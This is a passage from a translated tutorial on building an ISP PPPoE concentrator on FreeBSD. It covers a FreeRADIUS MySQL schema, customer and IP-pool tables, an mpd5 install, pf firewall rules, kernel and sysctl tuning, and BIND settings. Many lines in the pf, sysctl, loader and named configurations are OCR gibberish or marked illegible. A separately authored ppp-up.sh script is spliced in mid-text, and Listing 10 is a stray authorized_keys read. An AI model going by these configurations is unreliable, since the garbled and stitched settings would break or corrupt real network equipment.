  `pool_key` varchar(30) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `radippool_poolname_expire` (`pool_name`,`expiry_time`),
  KEY `framedipaddress` (`framedipaddress`),
  KEY `radippool_nasip_poolkey_ipaddress` (`nasipaddress`,`pool_key`,`framedipaddress`)
) ENGINE=InnoDB AUTO_INCREMENT=994 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radpostauth`
--

DROP TABLE IF EXISTS `radpostauth`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radpostauth` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user` varchar(64) NOT NULL DEFAULT '',
  `pass` varchar(64) NOT NULL DEFAULT '',
  `reply` varchar(32) NOT NULL DEFAULT '',
  `date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5673695 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `radreply`
--

DROP TABLE IF EXISTS `radreply`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `radreply` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `Attribute` varchar(32) NOT NULL DEFAULT '',
  `op` char(2) NOT NULL DEFAULT '=',
  `Value` varchar(253) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM AUTO_INCREMENT=27136 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Table structure for table `usergroup`
--

DROP TABLE IF EXISTS `usergroup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `usergroup` (
  `UserName` varchar(64) NOT NULL DEFAULT '',
  `GroupName` varchar(64) NOT NULL DEFAULT '',
  `priority` int(11) NOT NULL DEFAULT '1',
  KEY `UserName` (`UserName`(32))
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;


--
-- Table structure for table `velocidades`
--

DROP TABLE IF EXISTS `velocidades`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `velocidades` (
  `id` int(11) NOT NULL,
  `vdown` int(11) NOT NULL,
  `vup` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2014-10-20 22:54:08

Listing 10.

# cat ~/.ssh/authorized_keys


Insert the entries for a working client: these control concurrent access, user and password (Listing 11).

If you use PAP, use the Password attribute; if you use CHAP, use the ClearText-Password attribute.

Here we set the dynamic IP pool, the guarantee (Garantia), the IPv4 address to be delivered and the IPv6 address prefix. Note that when a Framed-IP-Address is present it takes priority; when that field is absent, the address is assigned from the IP pool (Listing 12).

Here we register the customer plans: Listing 13.

Here we link the user to the contracted plan: Listing 14.

The addresses registered in our IP pool can be public or private: Listing 15. Now start the services and we have a server ready to use!

Let's start authenticating clients! =D

Now we will build the PPPoE concentrator.

Start from a machine with a freshly installed FreeBSD; we will not cover the installation itself. It is a generic installation, but leave room in /var for logs.

Edit rc.conf with some settings and startup daemons (Listing 16).

A tip: if you are seeing very high CPU consumption and instability, disable tso, lro, hwcsum and txcsum. This has little impact on performance and quality, but considerably reduces the processing load (Listing 17).

We will install the necessary packages.

Install mpd5 on your FreeBSD:

# cd /usr/ports/net/mpd5
# make install clean

Install freeradius-client:

# cd /usr/ports/net/freeradius-client
# make install clean

Install bind:

# cd /usr/ports/dns/bind910
# make install clean

Install the MySQL client:

# cd /usr/ports/databases/mysql56-client
# make install clean

Install postfix:

# cd /usr/ports/mail/postfix
# make install clean

Install nginx:

# cd /usr/ports/www/nginx
# make install clean

[Figure: mpd5 web console, "Multi-link PPP Daemon for FreeBSD", current status summary showing the pppoe link DOWN]
Listing 11.

mysql> use radius
Database changed

mysql> select * from radcheck where username='testuser';
+-------------+----------+------------------+----+----------+-----------+
| id          | UserName | Attribute        | op | Value    | Bloqueado |
+-------------+----------+------------------+----+----------+-----------+
| <illegible> | TESTUSER | Password         | == | testpass | 0         |
| <illegible> | TESTUSER | Simultaneous-Use | =  | 1        | 0         |
+-------------+----------+------------------+----+----------+-----------+
3 rows in set (0.00 sec)

Listing 12.

mysql> select * from radreply where username='testuser';
+-------------+----------+--------------------+----+-------------------------+
| id          | UserName | Attribute          | op | Value                   |
+-------------+----------+--------------------+----+-------------------------+
| 266         | TESTUSER | Pool-Name          | := | main_pool               |
| <illegible> | TESTUSER | Garantia           | == | 20                      |
| <illegible> | TESTUSER | Framed-IP-Address  | == | 203.0.113.69            |
| <illegible> | TESTUSER | Framed-IPv6-Prefix | == | 2001:db8:cafe:cafe::/64 |
+-------------+----------+--------------------+----+-------------------------+
4 rows in set (0.00 sec)

Listing 13.

mysql> select * from radgroupcheck where trim(groupname)='TEST-50MB';
+-----+-----------+------------------+----+-------+
| id  | GroupName | Attribute        | op | Value |
+-----+-----------+------------------+----+-------+
| 249 | TEST-50MB | Simultaneous-Use | := | 1     |
+-----+-----------+------------------+----+-------+
1 row in set (0.00 sec)

mysql> select * from radgroupreply where trim(groupname)='TEST-50MB';
+-----+-----------+--------------------+----+------------------------------------------------+
| id  | GroupName | Attribute          | op | Value                                          |
+-----+-----------+--------------------+----+------------------------------------------------+
| 472 | TEST-50MB | Framed-Protocol    | := | PPP                                            |
| 473 | TEST-50MB | Service-Type       | := | Framed-User                                    |
| 474 | TEST-50MB | Framed-Compression | := | Van-Jacobsen-TCP-IP                            |
| 475 | TEST-50MB | mpd-limit          | += | in#1=all rate-limit 51000000 9562500 19125000  |
| 476 | TEST-50MB | mpd-limit          | += | out#1=all rate-limit 51000000 9562500 19125000 |
+-----+-----------+--------------------+----+------------------------------------------------+
5 rows in set (0.00 sec)

Listing 14.

mysql> select * from usergroup where username='testuser';
+----------+-----------+----------+
| UserName | GroupName | priority |
+----------+-----------+----------+
| TESTUSER | TEST-50MB |        1 |
+----------+-----------+----------+
1 row in set (0.00 sec)

Listing 15.

mysql> select * from radippool limit 3;
+-------------+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
| id          | pool_name | framedipaddress | nasipaddress | calledstationid | callingstationid | expiry_time | username | pool_key |
+-------------+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
| <illegible> | main_pool | <illegible>     |              |                 | NULL             | NULL        |          | 0        |
| <illegible> | main_pool | <illegible>     |              |                 | NULL             | NULL        |          | 0        |
| <illegible> | main_pool | <illegible>     |              |                 | NULL             | NULL        |          | 0        |
+-------------+-----------+-----------------+--------------+-----------------+------------------+-------------+----------+----------+
3 rows in set (0.00 sec)


Listing 16.

# cat /etc/rc.conf

hostname="valhalla.connectionlost.com.br"
ifconfig_igb4="inet 203.0.113.5 netmask 255.255.255.0"
ifconfig_igb4_alias0="inet <illegible in source> netmask 255.255.255.0"
ifconfig_igb0="<illegible in source>"
<illegible in source: jee VOUschole more e Ena one NNCRrer eie MED Nten tate>
<illegible in source: Enemy OUNneecm rome limb ti ewe>
ifconfig_igb2="up"
#ifconfig_igb1="up"
ifconfig_<illegible in source>="up"
defaultrouter="<illegible in source>"
gateway_enable="YES"
ipv6_activate_all_interfaces="YES"
ipv6_defaultrouter="<illegible in source>"
ifconfig_igb4_ipv6="inet6 2001:db8::5 prefixlen 32"
ipv6_gateway_enable="YES"

pf_enable="YES"
pf_rules="/etc/pf.conf"
pf_flags=""
pf_device="/dev/pf"
pflog_enable="YES"              # start pflogd(8)
pflog_flags=""                  # additional flags for pflogd startup
pflog_logfile="/var/log/pflog"  # where pflogd should store the logfile

dumpdev="AUTO"
<illegible in source>_enable="YES"
ntpd_enable="YES"
bsnmpd_enable="YES"
quagga_enable="YES"
quagga_flags="-d"
quagga_daemons="zebra ospfd ospf6d"
watchquagga_enable="YES"
watchquagga_flags="-dz -R '/usr/local/etc/rc.d/quagga restart' zebra ospfd ospf6d"
<illegible in source>_enable="YES"

mpd_enable="YES"
mpd_flags="<illegible in source> -s mpd"
named_enable="YES"
postfix_enable="YES"
sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
daily_clean_hoststat_enable="NO"
daily_status_mail_rejects_enable="NO"
daily_status_include_submit_mailq="NO"
daily_submit_queuerun="NO"
<illegible in source>_enable="YES"
syslogd_flags="<illegible in source>"
nginx_enable="YES"
fcgiwrap_enable="YES"
fcgiwrap_user="www"
fcgiwrap_socket="unix:/var/run/fcgiwrap/fcgiwrap.sock"
sshd_enable="YES"
#eof


Listing 17.

ifconfig_igb4="inet 203.0.113.5 netmask 255.255.255.0 -tso -lro -hwcsum -txcsum"
ifconfig_igb4_alias0="inet 198.51.100.5 netmask 255.255.255.0"
ifconfig_igb0="inet <illegible in source> netmask 255.255.255.0 -tso -lro -hwcsum -txcsum"
ifconfig_igb2="up -tso -lro -hwcsum -txcsum"


Listing 18.

edit /etc/pf.conf:

ext_if="igb4"
ext_ip="203.0.113.5"
ext_ip6="2001:db8::5"
Sxe Loead— i eo Ons
Ie eee— 190s"
Ee hp — 20. So
int_net="192.0.2.0/24"
Iie On Oedicask—= 290-0 Jiao 120”

set limit states 10000000
set limit table-entries 1000000
set limit src-nodes 1000000
set limit frags 1000000

set skip on lo0
set skip on lo1

set loginterface igb0

scrub in all

# tables filled by the start scripts from mpd5
table <PRIVADOS> persist
table <PUBLICOS> persist
table <PUBLICOS6> persist
table <BLOQUEADOS> persist
table <BLOQUEADOS6> persist

# table to release access from private IPs to the network, typically used for support
eeblle=<GOD> | 20370 sls 7 Go}

# table used to create a specific user for infrastructure and/or support, without
# internet access, just access to the LAN or to the addresses released in the IPSINFRA
# table (only create a PPPoE user that receives the address from the INFRA table)
table <INFRA> { 203.0.113.70 }
table <IPSINFRA> { 192.0.2.0/24 }

# table of addresses a blocked customer may still reach, usually the PPPoE
# concentrator IP and your web server, to show a block page and allow payment
maiilos NONBROCK> {257 0, Ole 205 20eel 3.57203. 0F Mise;
Gaile <NONBIOCKG> = { =) 200M cbs 4

# table with routers and PPPoE concentrators
walle <ROULERS> (202 02s. 20570 ie. 5}
Eales <ROULERSo> {9 200M does 200 dbs ss, }

# table of monitoring servers, usually a zabbix for checks and a cacti to collect
# the servers' snmp data
table <MONITORAMENTO> { 203.0.113.10 }
table <MONITORAMENTO6> { 2001:db8::10 }

# table of who is authorized to query the recursive DNS
table <DNS> { 127.0.0.1, 203.0.113.0/24, 198.51.100.0/24, 192.0.2.0/24 }
table <DNS6> { ::1, 2804:c40::/32 }

# table with the IPs of the Radius servers
table <RADIUS> { 198.51.100.2 }

# table released to the support system
table <SUPORTE> { 203.0.113.69 }

# table of local IPs of the PPPoE concentrator
pallor <hOChiL > 2057 Uells Sys oe 0 0r Syl Ua 7 25)
table <LOCAL6> { 2001:db8::5 }

# table released to the support system and the mpd5 web interface
table <SYSADMIN> { 203.0.113.69 }
table <SYSADMIN6> { 2804:c40::cafe }

# table of internal connected IPs
table <CONNECIED> =( 31332 ol lr, Io 2. 0S a

nat on $ext_if from <PRIVADOS> to any -> $ext_ip
nat on $ext_if from <GOD> to any -> $ext_ip

no rdr proto tcp from <BLOQUEADOS> to <NONBLOCK>

rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port 80 -> 127.0.0.1
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 80 -> ::1
rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port 443 -> 127.0.0.1 port 80
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 443 -> ::1 port 80

blocks In logucgiicketromeciy touoilemotoddedst
block quick log from <BLOQUEADOS> to !<NONBLOCK>
block quick log inet6 from <BLOQUEADOS6> to !<NONBLOCK6>
pass quick log proto {tcp,udp} from <BLOQUEADOS> to <ROUTERS> port 53
pass quick log inet6 proto {tcp,udp} from <BLOQUEADOS6> to <ROUTERS6> port 53
block in quick log from <PRIVADOS> to <PRIVADOS>
block in quick log from <PUBLICOS> to <PRIVADOS>
block in quick log from <PUBLICOS6> to <PRIVADOS>
block in quick log from <INFRA> to !<IPSINFRA>
block quick log proto {tcp,udp} from !<ROUTERS> to any port {199,2601,2604,2606}
block quick inet6 proto {tcp,udp} from !<ROUTERS6> to any port {199,2601,2604,2606}
block quick log proto {tcp,udp} from !<MONITORAMENTO> to any port {161}
block quick inet6 proto {tcp,udp} from !<MONITORAMENTO6> to any port {161}
block quick log proto {tcp,udp} from !<DNS> to <LOCAL> port 53
block quick log inet6 proto {tcp,udp} from !<DNS6> to <LOCAL6> port 53

block quick log from <PRIVADOS> to <CONNECTED>
block quick log from <PUBLICOS> to <CONNECTED>

PIO Cheque logon ob heh obo tuce, Ge) s from.
SINADINUISE? 1) Serie Gs) ieerel jsouee 57 2
block quick log on $ext_if proto {tcp,udp} from !<SYSADMIN> to <LOCAL> port 5006
block quick log on $ext_if proto {tcp,udp} from !<SYSADMIN> to <LOCAL> port {80,666}
block quick log on $ext_if proto {tcp,udp} from !<SUPORTE> to <LOCAL> port {80,666}
block quick log on $ext_if inet6 proto {tcp,udp} from !<SYSADMIN6> to $ext_ip6 port {80,666}
block quick log on $ext_if inet6 proto {tcp,udp} from !<SYSADMIN6> to $ext_ip6 port 5006

pass all

#eof
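The ruleset above says the <PRIVADOS>, <PUBLICOS>, <PUBLICOS6> and <CONNECTED> tables are filled by the mpd5 start scripts, and Listing 26 points mpd5 at /root/scripts/ppp-up.sh and ppp-down.sh, which the article does not print. The script below is an added example of such a script (mine, not the author's): it classifies the peer address into the right table and adds or deletes it with pfctl, rejecting anything that is not an address so a bad argument never widens a table. The mpd5 argument order assumed here ($2 = proto, $4 = peer address) and the PFCTL override are assumptions to check against mpd5(8) for your version.

```sh
#!/bin/sh
# Added example (not the article's /root/scripts/ppp-up.sh, which is not printed):
# an mpd5 up/down script that keeps the pf tables used by Listing 18 current.
# Assumed mpd5 argument order for iface up/down scripts (verify in mpd5(8)):
#   $1 interface  $2 proto (inet|inet6)  $3 local address  $4 peer address  $5 authname
# Point PFCTL at "echo" to dry-run on a host without pf.
PFCTL="${PFCTL:-/sbin/pfctl}"

# Print the pf table a peer belongs in, or fail for anything unparsable so a
# malformed argument can never be added to a table.
#   RFC 1918 peer  -> PRIVADOS  (NATed by "nat on $ext_if from <PRIVADOS>")
#   public v4 peer -> PUBLICOS  (routed; blocked towards <PRIVADOS>/<CONNECTED>)
#   v6 peer        -> PUBLICOS6
pf_table_for() {
    proto=$1 addr=$2
    case "$proto" in
    inet6)
        case "$addr" in
        *[!0-9a-fA-F:.]*|'') return 1 ;;     # rejects zone ids like fe80::1%igb0
        *:*) echo PUBLICOS6 ;;
        *) return 1 ;;
        esac ;;
    inet)
        case "$addr" in
        *[!0-9.]*|'') return 1 ;;
        10.*|192.168.*) echo PRIVADOS ;;
        172.1[6-9].*|172.2[0-9].*|172.3[01].*) echo PRIVADOS ;;
        *) echo PUBLICOS ;;
        esac ;;
    *) return 1 ;;
    esac
}

# Apply one link event: action is "add" (up-script) or "delete" (down-script).
# Every live v4 peer is also tracked in <CONNECTED>, which the ruleset uses to
# keep customers from reaching each other.
pf_table_update() {
    action=$1 proto=$2 addr=$3
    case "$action" in add|delete) ;; *) return 1 ;; esac
    table=$(pf_table_for "$proto" "$addr") || return 1
    "$PFCTL" -q -t "$table" -T "$action" "$addr" || return 1
    if [ "$proto" = inet ]; then
        "$PFCTL" -q -t CONNECTED -T "$action" "$addr" || return 1
    fi
    return 0
}

# Dispatch on the name mpd5 invoked us by (install the same file under both names).
case $(basename "$0") in
ppp-up.sh)   pf_table_update add    "$2" "$4" ;;
ppp-down.sh) pf_table_update delete "$2" "$4" ;;
esac
```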


Listing 19.

# vi /root/kernels/valhalla
# netgraph options

options HZ=4000

options NETGRAPH
options NETGRAPH_PPPOE
options NETGRAPH_SOCKET
options NETGRAPH_CISCO
options NETGRAPH_ECHO
options NETGRAPH_FRAME_RELAY
options NETGRAPH_HOLE
options NETGRAPH_KSOCKET
options NETGRAPH_LMI
options NETGRAPH_RFC1490
options NETGRAPH_TTY
options NETGRAPH_ASYNC
options NETGRAPH_BPF
options NETGRAPH_ETHER
options NETGRAPH_IFACE
options NETGRAPH_L2TP
options NETGRAPH_MPPC_ENCRYPTION
options NETGRAPH_PPP
options NETGRAPH_PPTPGRE
options NETGRAPH_TEE
options NETGRAPH_UI
options NETGRAPH_VJC
options NETGRAPH_CAR
options NETGRAPH_NETFLOW

options ALTQ
options ALTQ_CBQ
options ALTQ_RED
options ALTQ_RIO
options ALTQ_HFSC
options ALTQ_PRIQ
options ALTQ_NOPCC

device pf
device pflog
device pfsync

options IPSTEALTH
options ROUTETABLES=3
options SC_NORM_ATTR=(FG_GREEN|BG_BLACK)
options SC_KERNEL_CONS_ATTR=(FG_YELLOW|BG_BLACK)
options SC_HISTORY_SIZE=8192
#eof

# make buildkernel KERNCONF=valhalla
# make installkernel KERNCONF=valhalla

Listing 20.

# vi /etc/sysctl.conf
kern.ipc.maxsockbuf=157286400
net.inet.tcp.sendbuf_max=157286400
net.inet.tcp.recvbuf_max=157286400
I [te (ears Ne TN rele @ (ele Clana Gas il
kern.ipc.nmbclusters=2097152
Net INch ECO racw eunWade a rece lo= i
net.inet.tcp.cc.algorithm=htcp
net.inet.tcp.cc.htcp.adaptive_backoff=1
EN Tee Ie Oe - Ineo. ice see Neh erste Paki MEMEG is eOveny—(
net.inet.udp.blackhole=1
net.inet.tcp.blackhole=2
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1
net.inet.ip.portrange.first=1024
net.inet.ip.portrange.hifirst=1024
net.inet.ip.portrange.last=65535
kern.ipc.soacceptqueue=65535
kern.ipc.somaxconn=65535
net.inet.tcp.mssdflt=1460
net.inet.tcp.minmss=1300
Net eENer. BeO ma nelle 75 — SE KALINGA ce On se iCllohe ike —3)/4 | (are
NEE INCE ECO nbc ss) )=—i NEE INGE LED seeCvOUli TiC =G.0900
net.inet.tcp.sack.enable=1
net.inet.tcp.tso=0
net.inet.tcp.delacktime=50
net.inet.tcp.nolocaltimewait=1
kern.sched.interact=30
net.inet.tcp.syncache.rexmtlimit=0
net.inet.tcp.msl=5000
net.local.stream.sendspace=164240
net.local.stream.recvspace=164240
kern.random.sys.harvest.ethernet=0
kern.random.sys.harvest.interrupt=0
kern.random.sys.harvest.point_to_point=0
kern.random.sys.harvest.swi=0
kern.ipc.maxsockets=524288
net.inet.raw.maxdgram=16384
net.inet.raw.recvspace=16384
net.inet6.icmp6.nodeinfo=0
net.inet6.ip6.use_tempaddr=1
net.inet6.ip6.prefer_tempaddr=1
net.inet6.icmp6.rediraccept=0
net.inet6.ip6.accept_rtadv=0
##net.inet6.ip6.auto_linklocal=0
kern.ipc.shmmax=2147483648
kern.ipc.shmall=2097152
kern.maxvnodes=100000000
ini rite Oram selnGeoinomG—= 700)
net.graph.maxdgram=16772216
net.graph.recvspace=16772216
net.inet.tcp.drop_synfin=1
net.inet.tcp.syncookies=1
MEE eEN Cire Clee GOP me mechinne er—il
net.inet.icmp.log_redirect=0
net.inet.ip.redirect=0
net.inet.ip.rtexpire=2
net.inet.ip.rtminexpire=2
net.inet.tcp.syncookies=0
dev.igb.0.fc=0
dev.igb.1.fc=0
dev.igb.2.fc=0
dev.igb.3.fc=0
dev.igb.4.fc=0
dev.igb.5.fc=0
dev.igb.6.fc=0
dev.igb.7.fc=0
net.inet.ip.check_interface=1
net.inet.ip.process_options=0
IAN eee Nese Mee Cla —()
Me Eee Gel Ons Becinteii= |
ete Ner eo qc EOOmsy. lili —t
ete Net eo heMomlcyvaest—C
sieCtieley osc ees Gulisie vce
net.inet.tcp.ecn.enable=1
net.inet.tcp.maxtcptw=15000
net.inet.icmp.icmplim=0
net.inet.tcp.sendspace=262144
net.inet.tcp.recvspace=262144
net.inet.udp.recvspace=16772216
net.inet.udp.maxdgram=57344
net.inet.tcp.hostcache.expire=3900
net.inet.tcp.delayed_ack=1
kern.sched.slice=12
#eof

# vi /boot/loader.conf
kern.maxusers=1024
net.graph.maxdata=65536
net.graph.maxalloc=65536
kern.ipc.maxpipekva=620000000
net.inet.tcp.syncache.hashsize=1024
net.inet.tcp.syncache.bucketlimit=512
net.inet.tcp.syncache.cachelimit=65536
net.inet.tcp.hostcache.hashsize="16384"
net.inet.tcp.hostcache.bucketlimit="100"
coretemp_load="YES"
EC IEPs loOad=" (Eo
if_igb_load="YES"
loader_logo="beastie"
net.link.ifqmaxlen="1024"
hw.igb.txd="4096"
hw.igb.rxd="4096"
hwetgbe ex pEocess ime r= =
hw.igb.enable_aim="1"
hw.igb.max_interrupt_rate="32000"
hw.igb.num_queues="0"
hw.igb.enable_msix="1"
kern.ipc.nmbclusters="2097152"
kern.ipc.nmbufs="6434970"
kern.ipc.nmbjumbop="985356"
net.inet.tcp.tcbhashsize="65536"
net.isr.bindthreads="0"
net.isr.defaultqlimit="4096"
net.isr.maxthreads=7
kern.ipc.maxsockets=524288
#eof
Install fcgiwrap:

# cd /usr/ports/www/fcgiwrap
# make install clean

Install quagga:

# cd /usr/ports/net/quagga
# make install clean

Install log.io:

# cd /usr/ports/www/npm
# make install clean
# ln -s /usr/local/bin/python2.7 /usr/local/bin/python
# ln -s /usr/bin/clang++ /usr/bin/g++
# npm config set python /usr/local/bin/python2.7
# npm install -g node-gyp
# npm install -g log.io --user 'root'

Install sudo:

# cd /usr/ports/security/sudo
# make install clean

Install radvd:





Listing 21.

# vi /etc/resolv.conf
nameserver 127.0.0.1

# vi /usr/local/etc/namedb/named.conf

acl trusted {
	127.0.0.1;
	2 0 ees
	203.0.113.0/24;
	O20 2a.
	ZUM sala se 27375
};

options {
	// All file and path names are relative to the chroot directory,
	// if any, and should be fully qualified.
	directory	"/usr/local/etc/namedb/working";
	pid-file	"/var/run/named/pid";
	dump-file	"/var/dump/named_dump.db";
	statistics-file	"/var/stats/named.stats";

	allow-query { trusted; };
	allow-recursion { trusted; };

	JeSCeen=One fle sO. Ont 0s 0. lo. oe)
	listen-on-v6 {
		Se ZOOM dee ee
	};

	disable-empty-zone "255.255.255.255.IN-ADDR.ARPA";
	disable-empty-zone "0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
	disable-empty-zone "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA";
};

logging {
	channel audit_log {
		file "/var/log/security.log";
		severity debug;
		print-time yes;
	};
	channel xfer_log {
		file "/var/log/xfer.log";
		severity debug;
		print-time yes;
	};
	channel systemlog {
		file "/var/log/named.log";
		severity debug;
		print-time yes;
	};

	category default { systemlog; };
	category security { audit_log; systemlog; };
	category config { systemlog; };
	category xfer-in { xfer_log; };
	category xfer-out { xfer_log; };
	category notify { audit_log; };
	category update { audit_log; };
	category queries { audit_log; };
	category lame-servers { audit_log; };
};

zone "." { type hint; file "/usr/local/etc/namedb/named.root"; };

zone "localhost" { type master; file "/usr/local/etc/namedb/master/localhost-forward.db"; };
zone "127.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/localhost-reverse.db"; };
zone "255.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa" { type master; file "/usr/local/etc/namedb/master/localhost-reverse.db"; };

zone "0.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "10.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "16.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "17.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "18.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "19.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "20.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "21.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "22.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "23.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "24.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "25.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "26.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "27.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "28.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "29.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "30.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "31.172.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "168.192.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "64.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "65.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "66.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "67.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "68.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "69.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "70.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "71.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "72.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "73.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "74.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "75.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "76.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "77.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "78.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "79.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "80.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "81.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "82.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "83.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "84.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "85.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "86.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "87.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "88.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "89.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "90.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "91.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "92.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "93.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "94.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "95.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "96.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "97.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "98.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "99.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "100.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "101.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
zone "102.100.in-addr.arpa" { type master; file "/usr/local/etc/namedb/master/empty.db"; };
